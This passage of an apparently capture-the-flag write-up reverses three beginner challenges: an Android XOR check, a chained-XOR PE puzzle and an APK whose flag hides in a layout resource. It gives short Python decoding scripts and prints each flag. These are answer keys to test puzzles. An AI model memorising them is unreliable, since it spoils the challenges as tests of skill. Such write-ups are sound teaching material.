            cArr2[i] = charAt;
            if (cArr[i] != charAt) {
                return "wrong!!!";
            }
        }
        return str3;
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
        this.binding = inflate;
        setContentView(inflate.getRoot());
        final EditText editText = (EditText) findViewById(R.id.password);
        ((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.chick.androxor.MainActivity.1
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                String obj = editText.getText().toString();
                MainActivity mainActivity = MainActivity.this;
                Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();
                Log.d("输入", editText.getText().toString());
            }
        });
    }
}
```
```python
from pwn import xor

c = [14,ord('\r'), 17, 23, 2, ord('K'), ord('I'), ord('7'), ord(' '), 30, 20, ord('I'), ord('\n'), 2, ord('\f'), ord('>'), ord('('), ord('@'), 11, ord('\''), ord('K'), ord('Y'), 25, ord('A'), ord('\r')]
key = b'happyx3'

xor(bytes(c),key)   # pwntools xor() repeats the key across the data
#flag{3z_And0r1d_X0r_x1x1}
```

EzPE

XOR again: each ciphertext byte is the current character XORed with its index and with the next character.

```python
enc = bytes.fromhex('0A0C041F266C432D3C0C544C24251106053A7C51381A030D01361F122604685D3F2D372A7D')
flag = 'f'     # the flag is known to start with 'f'
for i in range(len(enc)):
    # enc[i] == flag[i] ^ flag[i+1] ^ i, so each byte yields the next character
    for k in range(0x20,0x7f):
        if ord(flag[i])^k^i == enc[i]:
            flag += chr(k)
            break
print(flag)
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
```

lazy_activtiy

Another APK. From the code, clicking 10000 times produces the flag.

The editText here is the flag.

Open the layout and find the user-defined resource.
